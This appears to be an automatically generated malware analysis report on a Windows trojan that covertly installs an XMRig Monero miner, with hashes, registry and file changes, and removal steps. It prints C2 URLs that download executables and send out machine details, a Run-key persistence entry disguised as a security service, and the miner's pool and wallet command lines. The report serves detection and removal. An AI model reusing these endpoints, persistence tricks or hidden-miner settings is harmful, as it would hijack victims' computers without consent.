Trojan.Win32.BitCoinMiner.fs_0b9503915a

by malwarelabrobot on November 11th, 2017 in Malware Descriptions.

Trojan.Win32.BitCoinMiner.fs (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 0b9503915a84cf8728bdf893cdf29550
SHA1: 73145018b075c896ddd78f4adc0448090c1e822a
SHA256: 4e66c34d2cd851494a4f2b3e7357b57a1b8a2fe37ea06446407345add0da5fcc
SSDeep: 1536:xNzKkrnvBzC1gObQBpEEW4QpuNQYS3W33Jk5nwKvxPPis86JFJ8JMpczaVPyOoWi:jJzAgOMK6uXm8nvRioJ8epczaVPeWN
Size: 154112 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-10-21 13:08:57
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1504

The Trojan injects its code into the following process(es):

%original file name%.exe:2692

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:2692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\MicroMon\curl.exe (55375 bytes)

Registry activity

The process %original file name%.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\0b9503915a84cf8728bdf893cdf29550_RASAPI32]
"EnableFileTracing" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Windows Security Server" = "c:\%original file name%.exe"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
ce91bfbac1f4dd01ae9c1725e51ee530 c:\Users\"%CurrentUserName%"\AppData\Roaming\MicroMon\curl.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 5095 5120 3.54168 c9cc4b822845c9abf6e3812fc4fe488b
.rdata 12288 18654 18944 3.9411 c71b061db959c7142cf7745036a92da7
.data 32768 6004 512 0.411943 c6dd9fabfdb1b71be53188953dcc8682
.rsrc 40960 127143 127488 5.29967 0cf853e67a4ff63a8301bf99429f507e
.reloc 172032 970 1024 1.07071 3bf68eb30ea62e3a9c8612ae50c6852e

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://95.46.8.51/panel/mr/curl.exe
hxxp://95.46.8.51/panel/gate.php?machine_id=e7568090100326&x64=False&version=1&video_card=VMware SVGA 3D (Microsoft Corporation - WDDM)&cpu=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&junk=11/10/2017 6:04:02 PM
hxxp://95.46.8.51/panel/set.php
dns.msftncsi.com
xmr-eu1.nanopool.org


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET TROJAN Likely Zbot Generic Post to gate.php Dotted-Quad
ET TROJAN Generic gate

Traffic

GET /panel/mr/curl.exe HTTP/1.1
Host: 95.46.8.51
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 10 Nov 2017 16:04:00 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Thu, 28 Sep 2017 16:27:37 GMT
ETag: "adc00-55a4262e3f040"
Accept-Ranges: bytes
Content-Length: 711680
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program

GET /panel/gate.php?machine_id=e7568090100326&x64=False&version=1&video_card=VMware SVGA 3D (Microsoft Corporation - WDDM)&cpu=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz&junk=11/10/2017 6:04:02 PM HTTP/1.1

Host: 95.46.8.51


HTTP/1.1 200 OK
Date: Fri, 10 Nov 2017 16:04:02 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Content-Length: 0
Content-Type: text/html



GET /panel/set.php HTTP/1.1

Host: 95.46.8.51


HTTP/1.1 200 OK
Date: Fri, 10 Nov 2017 16:04:02 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.22
Content-Length: 26
Content-Type: text/html
0 hXXp://server/exe update


The Trojan connects to the servers at the following location(s):

%original file name%.exe_2692:

.text
`.rsrc
@.reloc
v2.0.50727
System.Management
.ctor
WebClient
System.Net
System.IO
System.Threading
System.Reflection
System.IO.Compression
System.Diagnostics
System.Text
System.Security.Cryptography
WebRequest
RegistryKey
Microsoft.Win32
WebResponse
System.Globalization
OpenSubKey
System.Windows.Forms
get_ExecutablePath
set_WindowStyle
ProcessWindowStyle
CreateSubKey
GetExecutingAssembly
ARMsvc.exe
kernel32.dll
ntdll.dll
System.Collections.Generic
.cctor
System.Reflection.Emit
System.Runtime.CompilerServices
ContainsKey
System.Runtime.InteropServices
ProcessHandle
$6c748bd1-7967-470a-a0f9-d97429a03c9f
1.0.0.0
Confuser v1.9.0.0
_CorExeMain
mscoree.dll
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
hXXp://95.46.8.51/panel/gate.php
hXXp://95.46.8.51/panel/mr/audiodg.exe
hXXp://95.46.8.51/panel/mr/conhost.exe
hXXp://95.46.8.51/panel/mr/blake256.cl
hXXp://95.46.8.51/panel/mr/curl.exe
-o xmr-eu1.nanopool.org:14444 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQuf86m5hFZcERFLNuv.1 -p x -t 4 --donate-level=1
--blake256 -o hXXp://dcr.pool.mn:4722 -u vlad12345123.user -p password
curl.exe
audiodg.exe
hXXp://95.46.8.51/panel/set.php
2.0.0
1.6.2.0

curl.exe_3740:

.text
P`.data
.rdata
`@.eh_fram
0@.bss
.idata
.rsrc
pipe
libgcc_s_dw2-1.dll
"%s" hash self-test failed.
[%d-d-d d:d:d]%s %s%s
[%d-d-d d:d:d]
[%s:%u] duplicate job received, ignore
{"id":%lld,"jsonrpc":"2.0","method":"keepalived","params":{"id":"%s"}}
[%s:%u] getaddrinfo error: "%s"
[%s:%u] error: "%s", code: %lld
[%s:%u] unsupported method: "%s"
[%s:%u] login error code: %d
[%s:%u] JSON decode failed: "%s"
[%s:%u] read error: "%s"
login
[%s:%u] connect error: "%s"
[%s:%u] DNS error: "%s"
[%s:%u] DNS error: "No IPv4 records found"
{"id":%llu,"jsonrpc":"2.0","method":"submit","params":{"id":"%s","job_id":"%s","nonce":"%s","result":"%s"}}
[01;36m%s:%d
[01;30m%s
use pool %s:%d %s
[01;37m%u
[31m"%s"
rejected (%lld/%lld) diff %u "%s" (%llu ms)
accepted (%lld/%lld) diff %u (%llu ms)
[01;37m%s:%d
[01;37m%d
new job from %s:%d diff %d
fee.xmrig.com
stratum tcp://
.nicehash.com
XMRig 2.3.1
%d.%d.%d
libuv/%s
libjansson/%s
unable to open %s: %s
%s:%d: %s
%s: unsupported non-option argument '%s'
No pool URL supplied. Exiting.
userpass
-o, --url=URL URL of mining server
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
-k, --keepalive send keepalived for prevent timeout (need pool support)
--no-huge-pages disable huge pages support
--nicehash enable nicehash support
--print-time=N print hashrate report every N seconds
[01;36mXMRig/%s
[01;37m libuv/%s%s
* VERSIONS: XMRig/%s libuv/%s%s
[01;36m%d
[01;37m, %s, av=%d, %sdonate=%d%%%s
* THREADS: %d, %s, av=%d, %sdonate=%d%%%s
gcc/%d.%d.%d
2.3.1
[01;37mHUGE PAGES: %s, %s
* HUGE PAGES: %s, %s
[01;37mCPU: %s (%d) %sx64 %sAES-NI
* CPU: %s (%d) %sx64 %sAES-NI
* POOL #%d: %s:%d
[01;37mPOOL #%d:
[01;36m%s:%d
[01;36m%s
[22;36m%s %s
[01;36m%s H/s
speed 2.5s/60s/15m %s %s %s H/s max: %s H/s
Huge pages support was successfully enabled, but reboot required to use it
%s/%s (Windows NT %lu.%lu
) libuv/%s
%s near '%s'
%s near end of file
unable to decode byte 0x%x
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
NUL byte in object key not supported
duplicate object key
[%c%c%c] %-8s %p
Unknown system error %d
EAFNOSUPPORT
EMSGSIZE
EPIPE
EPROTONOSUPPORT
ESPIPE
address family not supported
ai_family not supported
socket type not supported
operation canceled
illegal operation on a directory
socket operation on non-socket
operation not supported on socket
operation not permitted
broken pipe
protocol not supported
cannot send after transport endpoint shutdown
1.14.0
!loop->wq_async.async_sent
((uv_shutdown_t*) req)->handle->type == UV_NAMED_PIPE
%s: (%d) %s
(%d) %s
src/win/pipe.c
pipe->flags & UV_HANDLE_CONNECTION
pipe->u.fd == -1 || pipe->u.fd > 2
req->pipeHandle == INVALID_HANDLE_VALUE
req->pipeHandle != INVALID_HANDLE_VALUE
handle->type == UV_NAMED_PIPE
hThread == handle->pipe.conn.readfile_thread
req->write_buffer.base
!(handle->flags & UV_HANDLE_PIPESERVER)
pipe->type == UV_NAMED_PIPE
pipe->flags & UV_HANDLE_READ_PENDING
!(handle->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
\\?\pipe\uv\%p-%lu
handle->pipe.serv.accept_reqs
handle->pipe.serv.accept_reqs[0].pipeHandle != INVALID_HANDLE_VALUE
avail >= sizeof(ipc_frame.header)
bytes == sizeof(ipc_frame.header)
ipc_frame.header.flags <= (UV_IPC_TCP_SERVER | UV_IPC_RAW_DATA | UV_IPC_TCP_CONNECTION)
avail - sizeof(ipc_frame.header) >= sizeof(ipc_frame.socket_info_ex)
bytes == sizeof(ipc_frame) - sizeof(ipc_frame.header)
handle->pipe.conn.remaining_ipc_rawdata_bytes >= bytes
handle->write_queue_size >= req->u.io.queued_bytes
handle->stream.conn.write_reqs_pending > 0
pipe->pipe.conn.eof_timer == NULL
!(pipe->flags & UV_HANDLE_NON_OVERLAPPED_PIPE)
pipe->pipe.conn.ipc_pid != -1
rfds.fd_count == 1
rfds.fd_array[0] == handle->socket
wfds.fd_count == 1
wfds.fd_array[0] == handle->socket
efds.fd_count == 1
efds.fd_array[0] == handle->socket
!(options->flags & ~(UV_PROCESS_DETACHED | UV_PROCESS_SETGID | UV_PROCESS_SETUID | UV_PROCESS_WINDOWS_HIDE | UV_PROCESS_WINDOWS_VERBATIM_ARGUMENTS))
src/win/tcp.c
server->flags & UV_HANDLE_TCP_SINGLE_ACCEPT
handle->type == UV_TCP
(tcp)->activecnt >= 0
!((tcp)->flags & UV__HANDLE_CLOSING)
handle->tty.rd.read_line_buffer.base != NULL
handle->tty.rd.read_line_buffer.len > 0
handle->u.fd == -1 || handle->u.fd > 2
!(handle->flags & UV_HANDLE_TTY_READABLE) || handle->tty.rd.read_raw_wait == NULL
src/win/udp.c
handle->type == UV_UDP
handle->send_queue_size >= req->u.io.queued_bytes
len > 0 && len < ARRAY_SIZE(key_name)
_ntdll.dll
kernel32.dll
powrprof.dll
0.0.0.0
0123456789
%u.%u.%u.%u
fdopt.data.stream->type == UV_NAMED_PIPE
!(fdopt.data.stream->flags & UV_HANDLE_CONNECTION)
!(fdopt.data.stream->flags & UV_HANDLE_PIPESERVER)
mode == (PIPE_READMODE_BYTE | PIPE_WAIT)
0.4.0
operator
operator
global constructors keyed to
global destructors keyed to
operator""
_matherr(): %s in %s(%g, %g) (retval=%g)
VirtualQuery failed for %d bytes at address %p
VirtualProtect failed with code 0x%x
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
unknown option -- %s
unknown option -- %c
option requires an argument -- %s
option requires an argument -- %c
Error cleaning up spin_keys for thread
once %p is %d
T%p %d %s
T%p %d V=%0X H=%p %s
Assertion failed: (%s), file %s, line %d
RWL%p %d %s
RWL%p %d V=%0X B=%d r=%ld w=%ld L=%p %s
C%p %d %s
C%p %d V=%0X w=%ld %s
GCC: (Rev2, Built by MSYS2 project) 7.1.0
GCC: (Rev1, Built by MSYS2 project) 7.2.0
RegCloseKey
RegOpenKeyExW
ConnectNamedPipe
CreateIoCompletionPort
CreateNamedPipeA
CreateNamedPipeW
GetNamedPipeHandleStateA
PeekNamedPipe
SetNamedPipeHandleState
WaitNamedPipeW
_acmdln
_amsg_exit
MapVirtualKeyW
ADVAPI32.dll
IPHLPAPI.DLL
KERNEL32.dll
msvcrt.dll
PSAPI.DLL
USER32.dll
USERENV.dll
WS2_32.dll
<requestedExecutionLevel level="asInvoker"/>
<!--The ID below indicates application support for Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!--The ID below indicates application support for Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!--The ID below indicates application support for Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!--The ID below indicates application support for Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!--The ID below indicates application support for Windows 10 -->
<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>
ntdll.dll
Cadvapi32.dll
%s\%.*s
\\?\UNC\
eHARDWARE\DESCRIPTION\System\CentralProcessor\%d
File: %ws, Line %u
tmsvcrt.dll
VVV.xmrig.com
Copyright (C) 2016-2017 xmrig.com
xmrig.exe

conhost.exe_1004:

.text
`.data
.rsrc
@.reloc
GDI32.dll
USER32.dll
msvcrt.dll
ntdll.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
KERNEL32.dll
IMM32.dll
ole32.dll
OLEAUT32.dll
PutInputInBuffer: EventsWritten != 1 (0x%x), 1 expected
Invalid message 0x%x
InitExtendedEditKeys: Unsupported version number(%d)
Console init failed with status 0x%x
CreateWindowsWindow failed with status 0x%x, gle = 0x%x
InitWindowsStuff failed with status 0x%x (gle = 0x%x)
InitSideBySide failed create an activation context. Error: %d
GetModuleFileNameW requires more than ScratchBufferSize(%d) - 1.
GetModuleFileNameW failed %d.
Invalid EventType: 0x%x
Dup handle failed for %d of %d (Status = 0x%x)
Couldn't grow input buffer, Status == 0x%x
InitializeScrollBuffer failed, Status = 0x%x
CreateWindow failed with gle = 0x%x
Opening Font file failed with error 0x%x
\ega.cpi
NtReplyWaitReceivePort failed with Status 0x%x
ConsoleOpenWaitEvent failed with Status 0x%x
NtCreatePort failed with Status 0x%x
GetCharWidth32 failed with error 0x%x
GetTextMetricsW failed with error 0x%x
GetSystemEUDCRangeW: RegOpenKeyExW(%ws) failed, error = 0x%x
RtlStringCchCopy failed with Status 0x%x
Cannot allocate 0n%d bytes
ReCreateDbcsScreenBuffer failed. Restoring to CP=%d
Invalid Parameter: 0x%x, 0x%x, 0x%x
ConsoleKeyInfo buffer is full
Invalid screen buffer size (0x%x, 0x%x)
SetROMFontCodePage: failed to memory allocation %d bytes
FONT.NT
Failed to set font image. wc=x, sz=(%x,%x)
Failed to set font image. wc=x sz=(%x, %x).
Failed to set font image. wc=x sz=(%x,%x)
FullscreenControlSetColors failed - Status = 0x%x
FullscreenControlSetPalette failed - Status = 0x%x
WriteCharsFromInput failed 0x%x
WriteCharsFromInput failed %x
RtlStringCchCopyW failed with Status 0x%x
CreateFontCache failed with Status 0x%x
GetKeyboardLayout
MapVirtualKeyW
VkKeyScanW
GetKeyboardState
UnhookWindowsHookEx
SetWindowsHookExW
GetKeyState
ActivateKeyboardLayout
GetKeyboardLayoutNameA
GetKeyboardLayoutNameW
_amsg_exit
_acmdln
ShipAssert
NtReplyWaitReceivePort
NtCreatePort
NtEnumerateValueKey
NtQueryValueKey
NtOpenKey
NtAcceptConnectPort
NtReplyPort
SetProcessShutdownParameters
GetCPInfo
conhost.pdb
version="5.1.0.0"
name="Microsoft.Windows.ConsoleHost"
<requestedExecutionLevel
name="Microsoft.Windows.ConsoleHost.SystemDefault"
publicKeyToken="6595b64144ccf1df"
name="Microsoft.Windows.SystemCompatible"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
%SystemRoot%
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\TrueTypeFont
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Console\FullScreen
WindowSize
ColorTableu
ExtendedEditkeyCustom
ExtendedEditKey
Software\Microsoft\Windows\CurrentVersion
\ !:=/.<>;|&
%d/%d
cmd.exe
desktop.ini
\console.dll
%d/%d
6.1.7601.17641 (win7sp1_gdr.110623-1503)
CONHOST.EXE
Windows
Operating System
6.1.7601.17641

%original file name%.exe_2692_rwx_00400000_00014000:

(identical to the strings listed above for %original file name%.exe_2692)


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1504

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Roaming\MicroMon\curl.exe (55375 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Windows Security Server" = "c:\%original file name%.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
